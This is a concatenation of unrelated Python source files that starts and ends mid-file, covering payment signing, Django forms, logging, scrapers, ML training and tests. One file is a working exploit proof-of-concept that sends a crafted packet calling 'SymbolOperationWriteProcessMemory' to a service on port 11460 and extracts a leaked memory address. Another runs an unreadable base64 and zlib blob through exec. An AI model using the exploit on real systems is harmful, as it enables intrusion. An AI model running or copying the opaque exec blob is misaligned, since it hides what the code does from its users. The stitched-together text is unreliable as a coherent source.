self.assertAllClose(ans, expected, check_dtypes=True) if __name__ == '__main__': absltest.main()
__author__ = 'Maruf Maniruzzaman' import logging import collections import urlparse import urllib2 import urllib from datetime import * import base64 import hmac import hashlib from urllib2 import HTTPError import xml.etree.cElementTree as ET from payment import Base logger = logging.getLogger(__name__) class SimplePay(Base): def __init__(self, access_key, secret_key, request_url, fps_url): Base.__init__(self) self.access_key = access_key self.secret_key = secret_key self.request_url = request_url self.FPS_URL = fps_url def create_form_inputs(self, amount, description, referenceId=None, immediateReturn=None, returnUrl=None, abandonUrl=None, process_immediate=None, ipnUrl=None, collect_shipping_address=None): form_inputs = {'accessKey': self.access_key, 'amount': str(amount), 'description': description, "signatureVersion": "2", "signatureMethod": "HmacSHA256"} if referenceId is not None: form_inputs['referenceId'] = str(referenceId) if immediateReturn is not None: form_inputs['immediateReturn'] = str(immediateReturn) if returnUrl is not None: form_inputs['returnUrl'] = returnUrl if abandonUrl is not None: form_inputs['abandonUrl'] = abandonUrl if process_immediate is not None: form_inputs['process_immediate'] = process_immediate if ipnUrl is not None: form_inputs['ipnUrl'] = ipnUrl if collect_shipping_address is not None: form_inputs['collectShippingAddress'] = str(collect_shipping_address) signature = self.generate_signature(self.secret_key, "POST", form_inputs, self.request_url) form_inputs['signature'] = signature return form_inputs def generate_form(self, form_inputs, request_url): assert isinstance(form_inputs, dict) inputs = ['<input type="image" src="https://authorize.payments.amazon.com/pba/images/payNowButton.png" border="0" />'] for key in form_inputs.keys(): value = form_inputs[key] if value: inputs.append('<input type="hidden" name="{0}" value="{1}" />'.format(key, value)) inputs_str = "\n ".join(inputs) form_str = '<form action="{0}" method="POST">\n '.format(request_url) + inputs_str + '\n</form>\n' return form_str def verify_success_return(self, data, success_url): """ This function verifies a success return from Amazon. It queries Amazon to make sure the response was valid. :param data: all query key/values as dict (something like request.GET.urlencode()) :param success_url: url that was set as success_url while creating input form :return: Status as either "VerifyFailed" or Success """ if not self.verify_signature(data, "GET", success_url): logger.error("Validation of Amazon request failed.") return "VerifyFailed" return "Success" def prepare_params(self, action, method, params): values = {"AWSAccessKeyId": self.access_key, "SignatureMethod": "HmacSHA256", "SignatureVersion": 2, "Timestamp": datetime.utcnow().isoformat() + '-00:00', "Version": "2008-09-17", "Action": action} values.update(params) values["Signature"] = self.generate_signature(self.secret_key, method, values, self.FPS_URL) return values def execute_fps(self, action, method, **params): """ Make a request against the FPS api. """ values = self.prepare_params(action, method, params) url = "%s?%s" % (self.FPS_URL, urllib.urlencode(values)) request = urllib2.Request(url) try: req = urllib2.urlopen(request) response = req.read() except HTTPError, e: if e.code == 400: response = e.read() else: raise return response def verify_signature(self, raw_data, http_method, endpoint_uri): response = self.execute_fps( "VerifySignature", http_method, UrlEndPoint=endpoint_uri, HttpParameters=raw_data) xml = ET.XML(response) el = xml.find(".//{http://fps.amazonaws.com/doc/2008-09-17/}VerificationStatus") return el is not None and el.text == "Success" def refund(self, CallerDescription, CallerReference, RefundAmount_CurrencyCode, RefundAmount_Value, TransactionId): params = { "CallerDescription": CallerDescription, "CallerReference": CallerReference, "RefundAmount.CurrencyCode": RefundAmount_CurrencyCode, "RefundAmount.Value": RefundAmount_Value, "TransactionId": TransactionId } return self._do_refund(params) def _do_refund(self, params): return self.execute_fps("Refund", "GET", params) @staticmethod def generate_signature(secret_key, verb, values, request_url): """ Generate signature for call. (same signature is used for CBUI call) NOTE: Python's urlencode doesn't work for Amazon. Spaces need to be %20 and not +. This only affects the signature generation, not the key/values submitted. """ keys = values.keys() keys.sort() sorted_values = collections.OrderedDict([(k, values[k]) for k in keys]) query = urllib.urlencode(sorted_values) query = query.replace("+", "%20") parsed = urlparse.urlsplit(request_url) base = "%(verb)s\n%(hostheader)s\n%(requesturi)s\n%(query)s" % { "verb": verb.upper(), "hostheader": parsed.hostname.lower(), "requesturi": parsed.path, "query": query} s = hmac.new(secret_key, base, hashlib.sha256) return base64.encodestring(s.digest())[:-1]
from django import forms from posts.models import Post class PostForm(forms.ModelForm): """Form post.""" class Meta: model = Post fields = ["title", "text"] help_texts = { "text": ("Напишите текст"), "title": ("Напишите заголовок") } class EmailForm(forms.Form): subject = forms.CharField( label='Тема', widget=forms.TextInput(attrs={'class': 'form-control'})) content = forms.CharField( label='Текст', widget=forms.TextInput(attrs={'class': 'form-control', "rows": 5}))
from ..remote import RemoteModel from infoblox_netmri.utils.utils import check_api_availability class NotificationRemote(RemoteModel): """ Configurable notifications on issues, etc. | ``id:`` The internal NetMRI identifier for the notification. | ``attribute type:`` number | ``auth_user_id:`` User ID of the creator. | ``attribute type:`` number | ``category:`` A category of the notification. Possible values are 'issue','change','job','systemalert'. | ``attribute type:`` string | ``delivery_method:`` Delivery method of the notification. Possible values are 'email', 'syslog', 'snmp'. | ``attribute type:`` string | ``mime:`` Message MIME type. Possible values are 'html' or 'text'. | ``attribute type:`` string | ``subject:`` Subject of the notification e-mail. | ``attribute type:`` string | ``message_template:`` Notification message template. | ``attribute type:`` string | ``details_template:`` Notification details template. | ``attribute type:`` string | ``to:`` Notification e-mail 'To:' field. | ``attribute type:`` string | ``created_at:`` The date and time the record was initially created in NetMRI. | ``attribute type:`` datetime | ``updated_at:`` The date and time the record was last modified in NetMRI. | ``attribute type:`` datetime | ``from:`` Notification e-mail 'from:' field. | ``attribute type:`` string | ``from_name:`` Name for the 'from:' field. | ``attribute type:`` string | ``severity:`` Severity level from 1 to 3. | ``attribute type:`` number | ``all_in_category_ind:`` Notify for all in the category. | ``attribute type:`` bool | ``all_device_groups_ind:`` Do not restrict notification to particular device groups. | ``attribute type:`` bool | ``all_interface_groups_ind:`` Do not restrict notification to particular interface groups. | ``attribute type:`` bool | ``time_window_id:`` Time window id. | ``attribute type:`` number | ``event_type:`` List of events that we subscribe to. Default is all events. | ``attribute type:`` string | ``send_clearing_ind:`` Whether to send a notification on issue clearing. | ``attribute type:`` bool | ``cron:`` Schedule for summary notifications in cron format. | ``attribute type:`` string | ``last_run:`` Last run. | ``attribute type:`` datetime """ properties = ("id", "auth_user_id", "category", "delivery_method", "mime", "subject", "message_template", "details_template", "to", "created_at", "updated_at", "from", "from_name", "severity", "all_in_category_ind", "all_device_groups_ind", "all_interface_groups_ind", "time_window_id", "event_type", "send_clearing_ind", "cron", "last_run", )
from django.contrib import admin from models import * class RegistrationProfileAdmin(admin.ModelAdmin): pass admin.site.register( RegistrationProfile, RegistrationProfileAdmin)
__author__ = 'btorres-gil'
#!/usr/bin/env python """ syslog client """ import argparse import logging from logging.handlers import SysLogHandler class SysLog: def __init__(self, *, instrument, level): # If you define a level with the same numeric value, it overwrites the # predefined value; the predefined name is lost. logging.addLevelName(10, '<D>') # DEBUG logging.addLevelName(20, '<I>') # INFO logging.addLevelName(30, '<W>') # WARNING logging.addLevelName(40, '<E>') # ERROR logging.addLevelName(50, '<C>') # CRITICAL root = logging.getLogger() root.setLevel(level) root.handlers = [] # syslog handler relies on syslog server to add timestamp syslog_handler = SysLogHandler('/dev/log') syslog_handler.setLevel(level) syslog_formatter = logging.Formatter(instrument + '-%(module)s[%(process)d]: %(levelname)s %(message)s') syslog_handler.setFormatter(syslog_formatter) root.addHandler(syslog_handler) # console handler applies local timestamp console_handler = logging.StreamHandler(None) console_handler.setLevel(level) console_formatter = logging.Formatter('%(asctime)s ' + instrument + '-%(module)s[%(process)d]: %(levelname)s %(message)s') console_handler.setFormatter(console_formatter) root.addHandler(console_handler) self.syslog_handler = syslog_handler self.console_handler = console_handler #for h in root.handlers : print(str(h)) # ------------------------ self-test ---------------------------- def main(): # Process arguments parser = argparse.ArgumentParser() parser.add_argument('-v', action='store_true', help='be verbose') parser.add_argument('-P', metavar='INSTRUMENT', default='TST', help='instrument_name[:station_number]') args = parser.parse_args() # choose logging level if args.v: level=logging.DEBUG else: level=logging.INFO # configure logging handlers logger = SysLog(instrument=args.P, level=level) # log test messages logging.critical('this is a test critical message') logging.error('this is a test error message') logging.warning('this is a test warning message') logging.info('this is a test info message') logging.debug('this is a test debug message') return if __name__ == '__main__': main()
import zlib, base64 exec(zlib.decompress(base64.b64decode('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'))) # Created by pyminifier (https://github.com/liftoff/pyminifier)
import sys import polib from django.core.management.base import BaseCommand from tradukoj.models import Namespace class Command(BaseCommand): # pylint: disable=C0301 help = 'Show incompatible Translation Key for plain tree generation' exitcode = 0 data = None def add_arguments(self, parser): parser.add_argument( '--pofile', dest='pofile', required=False, help='Test pofile instead database', ) def handle(self, *args, **options): if 'pofile' in options: po_file = polib.pofile(options['pofile']) self.data = {"test": {}} for entry in po_file: self.test_text(entry.msgid) self.stdout.write(self.style.SUCCESS(f"Done {options['pofile']}")) sys.exit(self.exitcode) for namespace in Namespace.objects.all(): self.stdout.write(f"Testing {namespace}...") self.data = {"test": {}} for translationkey in namespace.translation_keys.all(): self.test_text(translationkey.text) self.stdout.write(self.style.SUCCESS(f"Done {namespace} test.")) sys.exit(self.exitcode) def test_text(self, translationkey): if not translationkey: return if not translationkey.strip(): return deep = translationkey.split('.') _current_node = self.data['test'] for i, element in enumerate(deep): if i == (len(deep) - 1): if not isinstance(_current_node, dict): self.stdout.write( f"Error: The key `{element}` in `{translationkey}` tries to be an object but there are string on this path" ) self.exitcode = 1 break if element in _current_node: self.stdout.write( f"Error: The key `{element}` in `{translationkey}` tries to be an string but there are object on this path" ) self.exitcode = 1 break _current_node[element] = str(translationkey) break if not element in _current_node: _current_node[element] = {} if isinstance(_current_node[element], str): self.stdout.write( f"Error: The key `{element}` in `{translationkey}` tries to be an object but there are string on this path" ) self.exitcode = 1 break if element not in _current_node: _current_node[element] = {} _current_node = _current_node[element]
#!/usr/bin/env python3 import socket import sys from struct import pack # psAgentCommand buf = bytearray([0x41] * 0xC) buf += pack("<i", 0x2000) # opcode buf += pack("<i", 0x0) # 1st memcpy: offset buf += pack("<i", 0x100) # 1st memcpy: size field buf += pack("<i", 0x100) # 2nd memcpy: offset buf += pack("<i", 0x100) # 2nd memcpy: size field buf += pack("<i", 0x200) # 3rd memcpy: offset buf += pack("<i", 0x100) # 3rd memcpy: size field buf += bytearray([0x41] * 0x8) # psCommandBuffer symbol = b"SymbolOperationWriteProcessMemory" + b"\x00" buf += symbol + b"A" * (100 - len(symbol)) buf += b"B" * 0x100 buf += b"C" * 0x100 # Checksum buf = pack(">i", len(buf) - 4) + buf def parseResponse(response): """ Parse a server response and extract the leaked address """ pattern = b"Address is:" address = None for line in response.split(b"\n"): if line.find(pattern) != -1: address = int((line.split(pattern)[-1].strip()), 16) if not address: print("[-] Could not find the address in the Response") sys.exit() return address def main(): server = "192.168.185.10" port = 11460 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, port)) s.send(buf) response = s.recv(1024) address = parseResponse(response) print(hex(address)) s.close() print("[+] Packet sent") sys.exit(0) if __name__ == "__main__": main()
import numpy as np from l5kit.data import get_combined_scenes, SCENE_DTYPE def test_empty_input() -> None: # Empty scenes = np.array([], dtype=SCENE_DTYPE) combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 0 def test_trivial_input() -> None: # One scene scenes = np.zeros(1, dtype=SCENE_DTYPE) scenes[0]["host"] = "some-host" scenes[0]["start_time"] = 0 scenes[0]["end_time"] = 1000 scenes[0]["frame_index_interval"] = [0, 10] combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 1 np.testing.assert_array_equal(scenes, combined_scenes) def test_followup_scenes() -> None: num_scenes = 10 scenes = np.zeros(num_scenes, dtype=SCENE_DTYPE) for i in range(num_scenes): scenes[i]["host"] = "some-host" scenes[i]["start_time"] = i * 1000 scenes[i]["end_time"] = (i + 1) * 1000 scenes[i]["frame_index_interval"] = [i * 10, (i + 1) * 10] combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 1 combo_scene = combined_scenes[0] assert combo_scene["host"] == "some-host" assert combo_scene["start_time"] == 0 assert combo_scene["end_time"] == 10000 np.testing.assert_array_equal(combo_scene["frame_index_interval"], np.array([0, 100])) # To follow up they must be the same host scenes[1]["host"] = "some-other-host" combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 3 # And their timestamps must follow up exactly scenes[5]["start_time"] += 1 combined_scenes = get_combined_scenes(scenes) assert len(combined_scenes) == 4
class _PickleMessage: """ The abstract class that is the superclass for persistent messages sent from one component to another. This class has no properties or methods. Users subclass Message and add properties. The PEX framework provides the persistence to objects derived from the Message class. """ pass
try: import env except ImportError: print('No env file found when starting crawler. Using fallback methods.') pass import boto3 import json import os from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.common.keys import Keys import time # This crawler is a standalone script. It relies on the env file to get the AWS bucket and the path to the chromedriver. # If you do not have these environmental variables set, you can set them below and it will use them instead. # This crawler also requires that your AWS credentials are already set up in your environment. It will not set them up for you nor will it prompt you for them. # The workflow for this script is as follows: # 1. Download the current data from S3 # 2. Crawl Twitch for all currently live streamers marked as 'vtuber' # 3. Create a new timestamped file with the cumulative data # 4. Upload the new data to S3, overwriting previous (backups will be kept locally to conserve S3 space) # Run the crawler from the top def full_cycle(): download_from_s3() data = crawl() update_file(data) upload_to_s3() # Load Twitch directory using Selenium, then scroll through the page, scraping the data as we go def crawl(): webdriver_service = Service(os.environ.get('CHROMEDRIVER_PATH', 'path-to-your-chromedriver')) driver = webdriver.Chrome(service = webdriver_service) driver.get('https://www.twitch.tv/directory/all/tags/52d7e4cc-633d-46f5-818c-bb59102d9549') time.sleep(5) # Wait for page to load before attempting to crawl vtubers = {} # Joint storage that will be returned once new data is gathered vtuber_storage = {} # Storage for previous data from file crawl_start = time.time() with open('../Data/vtubers.json', 'r+', encoding='utf-8') as f: try: vtuber_storage = json.load(f) # Load previous data from file if it exists except json.decoder.JSONDecodeError: pass card = driver.find_element_by_xpath('//a[@data-a-target="preview-card-title-link"]') # First card DOM element while True: card.send_keys(Keys.END) # "Scroll" time.sleep(1) # Wait for page to load cards = driver.find_elements_by_xpath('//a[@data-test-selector="preview-card-avatar"]') # Break based on time rather than if we have reached the end of the page, because the page has more data than we can hope to scrape if time.time() - crawl_start > 300: break # Stop scraping past five minutes (scraping this way uses exponential resources over time) else: for card in cards: # find the vtuber's avatar image thumb = card.find_element_by_xpath('.//img') vtubers[card.get_attribute('href').split('/')[-1]] = {'twitch': {}, 'thumbnail': thumb.get_attribute('src')} # for each entry in vtubers for vtuber in vtubers: # if vtuber is not in vtuber_storage, add it to the storage if vtuber not in vtuber_storage: vtuber_storage[vtuber] = {'twitch': {}, 'thumbnail': vtubers[vtuber]['thumbnail']} # if vtuber is in vtuber_storage, only add thumbnail if it is not already there elif 'thumbnail' not in vtuber_storage[vtuber]: vtuber_storage[vtuber]['thumbnail'] = vtubers[vtuber]['thumbnail'] #vtubers = {**vtubers, **vtuber_storage} # Merge the two dictionaries, with priority given to the file data return vtuber_storage # Overwrite the cumulative data file with the new data, making a backup in the process def update_file(data): with open(f'../Data/vtubers_{time.time()}.json', 'w', encoding='utf-8') as f: # Save timestamped backup file json.dump(data, f, ensure_ascii=False, indent=4) with open('../Data/vtubers.json', 'w', encoding='utf-8') as f: # Save cumulative file json.dump(data, f, ensure_ascii=False, indent=4) # Upload the cumulative data to specified S3 bucket def upload_to_s3(): s3 = boto3.client('s3') with open('../Data/vtubers.json', "rb") as f: # This is hard-coded only because it is designed to overwrite itself each run s3.upload_fileobj(f, os.environ.get('S3_BUCKET', 'your_bucket_here'), os.path.basename('../Data/vtubers.json'), ExtraArgs={'ACL':'public-read'}) # Download the cumulative data from specified S3 bucket def download_from_s3(): s3 = boto3.client('s3') s3.download_file(os.environ.get('S3_BUCKET', 'your_bucket_here'), os.path.basename('../Data/vtubers.json'), '../Data/vtubers.json') while True: # Run the crawler every hour full_cycle() time.sleep(3600)
"""Partially learned gradient descent scheme for ellipses.""" import os import sys import adler #adler.util.gpu.setup_one_gpu() from adler.tensorflow import prelu, cosine_decay, reference_unet, psnr import tensorflow as tf import numpy as np import odl import odl.contrib.tensorflow def random_ellipse(interior=False): if interior: x_0 = np.random.rand() - 0.5 y_0 = np.random.rand() - 0.5 else: x_0 = 2 * np.random.rand() - 1.0 y_0 = 2 * np.random.rand() - 1.0 magnitude = np.random.choice([-1, 1]) * (0.1 + np.random.exponential(0.2)) return (magnitude, np.random.exponential() * 0.2, np.random.exponential() * 0.2, x_0, y_0, np.random.rand() * 2 * np.pi) def random_phantom(spc, n_ellipse=50, interior=False): n = np.random.poisson(n_ellipse) ellipses = [random_ellipse(interior=interior) for _ in range(n)] return odl.phantom.ellipsoid_phantom(spc, ellipses) def make_difference(space): minp = (np.random.rand(2) - 0.5) - 0.05 maxp = minp + 0.1 + 0.1 * (np.random.rand(2) - 0.5) scale = 0.5 * space.domain.extent magnitude = 0.1 return magnitude * odl.phantom.cuboid(space, scale * minp, scale * maxp) power = float(sys.argv[1]) const_val = 10 ** power print('Running with const_val={}'.format(const_val)) np.random.seed(0) name = os.path.splitext(os.path.basename(__file__))[0] + '/' + str(const_val) sess = tf.InteractiveSession() # Create ODL data structures size = 128 space = odl.uniform_discr([-64, -64], [64, 64], [size, size], dtype='float32') geometry = odl.tomo.parallel_beam_geometry(space, num_angles=30) operator = odl.tomo.RayTransform(space, geometry) # Ensure operator has fixed operator norm for scale invariance opnorm = odl.power_method_opnorm(operator) operator = (1 / opnorm) * operator # Create tensorflow layer from odl operator odl_op_layer = odl.contrib.tensorflow.as_tensorflow_layer(operator, 'RayTransform') odl_op_layer_adjoint = odl.contrib.tensorflow.as_tensorflow_layer(operator.adjoint, 'RayTransformAdjoint') # User selected paramters n_data = 5 n_iter = 10 n_primal = 5 n_dual = 5 def generate_data(validation=False): """Generate a set of random data.""" n_generate = 1 if validation else n_data y_arr1 = np.empty((n_generate, operator.range.shape[0], operator.range.shape[1], 1), dtype='float32') x_true_arr1 = np.empty((n_generate, space.shape[0], space.shape[1], 1), dtype='float32') y_arr2 = np.empty((n_generate, operator.range.shape[0], operator.range.shape[1], 1), dtype='float32') x_true_arr2 = np.empty((n_generate, space.shape[0], space.shape[1], 1), dtype='float32') for i in range(n_generate): if validation: phantom1 = odl.phantom.shepp_logan(space, True) else: phantom1 = random_phantom(space) phantom2 = phantom1 + make_difference(space) data1 = operator(phantom1) noisy_data1 = data1 + odl.phantom.white_noise(operator.range) * np.mean(np.abs(data1)) * 0.05 data2 = operator(phantom2) noisy_data2 = data2 + odl.phantom.white_noise(operator.range) * np.mean(np.abs(data2)) * 0.05 x_true_arr1[i, ..., 0] = phantom1 y_arr1[i, ..., 0] = noisy_data1 x_true_arr2[i, ..., 0] = phantom2 y_arr2[i, ..., 0] = noisy_data2 return y_arr1, x_true_arr1, y_arr2, x_true_arr2 with tf.name_scope('placeholders'): x_true1 = tf.placeholder(tf.float32, shape=[None, size, size, 1], name="x_true1") y_rt1 = tf.placeholder(tf.float32, shape=[None, operator.range.shape[0], operator.range.shape[1], 1], name="y_rt1") x_true2 = tf.placeholder(tf.float32, shape=[None, size, size, 1], name="x_true2") y_rt2 = tf.placeholder(tf.float32, shape=[None, operator.range.shape[0], operator.range.shape[1], 1], name="y_rt2") is_training = tf.placeholder(tf.bool, shape=(), name='is_training') const = tf.placeholder(tf.float32, shape=(), name='const') def apply_conv(x, filters=32): return tf.layers.conv2d(x, filters=filters, kernel_size=3, padding='SAME', kernel_initializer=tf.contrib.layers.xavier_initializer()) def learned_primal_dual(data, reuse): with tf.variable_scope('learned_primal_dual', reuse=reuse): with tf.name_scope('initial_values'): primal = tf.concat([tf.zeros_like(x_true1)] * n_primal, axis=-1) dual = tf.concat([tf.zeros_like(data)] * n_dual, axis=-1) for i in range(n_iter): with tf.variable_scope('dual_iterate_{}'.format(i)): evalop = odl_op_layer(primal[..., 1:2]) update = tf.concat([dual, evalop, data], axis=-1) update = prelu(apply_conv(update), name='prelu_1') update = prelu(apply_conv(update), name='prelu_2') update = apply_conv(update, filters=n_dual) dual = dual + update with tf.variable_scope('primal_iterate_{}'.format(i)): evalop = odl_op_layer_adjoint(dual[..., 0:1]) update = tf.concat([primal, evalop], axis=-1) update = prelu(apply_conv(update), name='prelu_1') update = prelu(apply_conv(update), name='prelu_2') update = apply_conv(update, filters=n_primal) primal = primal + update return primal[..., 0:1] with tf.name_scope('tomography'): recon1 = learned_primal_dual(y_rt1, reuse=False) recon2 = learned_primal_dual(y_rt2, reuse=True) with tf.name_scope('edge_detect'): recons = tf.concat([recon1, recon2], axis=-1) difference_update = reference_unet(recons, 1, ndim=2, features=64, keep_prob=1.0, use_batch_norm=False, activation='relu', is_training=is_training, name='edge_result') difference_result = (recon1 - recon2) + difference_update with tf.name_scope('loss'): loss_tomography = (tf.reduce_mean((recon1 - x_true1) ** 2) + tf.reduce_mean((recon2 - x_true2) ** 2)) loss_difference = tf.reduce_mean((difference_result - (x_true1 - x_true2)) ** 2) loss = loss_tomography + const * loss_difference with tf.name_scope('optimizer'): # Learning rate global_step = tf.Variable(0, trainable=False) maximum_steps = 100001 starter_learning_rate = 3e-4 learning_rate = cosine_decay(starter_learning_rate, global_step, maximum_steps, name='learning_rate') update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): opt_func = tf.train.AdamOptimizer(learning_rate=learning_rate, beta2=0.99) tvars = tf.trainable_variables() grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), 1) optimizer = opt_func.apply_gradients(zip(grads, tvars), global_step=global_step) # Summaries # tensorboard --logdir=... with tf.name_scope('summaries'): tf.summary.scalar('loss', loss) tf.summary.scalar('loss_tomography', loss_tomography) tf.summary.scalar('loss_difference', loss_difference) tf.summary.scalar('psnr1', psnr(recon1, x_true1)) tf.summary.scalar('psnr2', psnr(recon2, x_true2)) tf.summary.image('recon1', recon1) tf.summary.image('recon2', recon2) tf.summary.image('x_true1', x_true1) tf.summary.image('x_true2', x_true2) tf.summary.image('difference', difference_result) tf.summary.image('difference_true', (x_true1 - x_true2)) merged_summary = tf.summary.merge_all() test_summary_writer, train_summary_writer = adler.tensorflow.util.summary_writers(name, cleanup=True) # Initialize all TF variables sess.run(tf.global_variables_initializer()) # Add op to save and restore saver = tf.train.Saver() # Generate validation data y_arr_validate1, x_true_arr_validate1, y_arr_validate2, x_true_arr_validate2 = generate_data(validation=True) if 0: saver.restore(sess, adler.tensorflow.util.default_checkpoint_path(name)) # Train the network for i in range(0, maximum_steps): if i%10 == 0: y_arr1, x_true_arr1, y_arr2, x_true_arr2 = generate_data() _, merged_summary_result_train, global_step_result = sess.run([optimizer, merged_summary, global_step], feed_dict={x_true1: x_true_arr1, y_rt1: y_arr1, x_true2: x_true_arr2, y_rt2: y_arr2, is_training: True, const: const_val}) if i>0 and i%10 == 0: loss_result, merged_summary_result, global_step_result = sess.run([loss, merged_summary, global_step], feed_dict={x_true1: x_true_arr_validate1, y_rt1: y_arr_validate1, x_true2: x_true_arr_validate2, y_rt2: y_arr_validate2, is_training: False, const: const_val}) train_summary_writer.add_summary(merged_summary_result_train, global_step_result) test_summary_writer.add_summary(merged_summary_result, global_step_result) print('iter={}, loss={}'.format(global_step_result, loss_result)) if i>0 and i%1000 == 0: saver.save(sess, adler.tensorflow.util.default_checkpoint_path(name))
# Copyright 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from cloudferry.lib.utils import remote_runner def has_ssh_connectivity(connection_user, user, key, src_host, dst_host): """:returns: True if `user@src_host` can ssh into `dst_host` with `key`""" rr = remote_runner.RemoteRunner(src_host, connection_user, timeout=5) try: ssh = ("ssh -i {key} " "-o StrictHostKeyChecking=no " "-o UserKnownHostsFile=/dev/null " "{user}@{dst_host} 'echo'") rr.run(ssh.format(key=key, user=user, dst_host=dst_host)) return True except remote_runner.RemoteExecutionError: return False
import unittest from incometax.contributions import SSSContribution, PagIBIGContribution, PhilHealthContribution class TestSSSContribution(unittest.TestCase): def test_lowest_contribution(self): c = SSSContribution(2000) self.assertEqual(c.monthly_contribution, 80) def test_other_contribution(self): c = SSSContribution(8251) self.assertEqual(c.monthly_contribution, 340) def test_largest_contribution(self): c = SSSContribution(20000) self.assertEqual(c.monthly_contribution, 800) class TestPhilHealthContribution(unittest.TestCase): def test_value_error_for_invalid_membership(self): self.assertRaises(ValueError, PhilHealthContribution, 200, 'test') def test_contribution_value_employed(self): self.assertEqual( PhilHealthContribution(9000).monthly_contribution, 137.50 ) self.assertEqual( PhilHealthContribution(11000).monthly_contribution, (11000*0.0275)/2 ) self.assertEqual( PhilHealthContribution(43000).monthly_contribution, 1100 ) def test_contribution_value_self_employed(self): self.assertEqual( PhilHealthContribution(20000, 'self-employed').monthly_contribution, 200 ) self.assertEqual( PhilHealthContribution(26000, 'self-employed').monthly_contribution, 300 ) if __name__ == 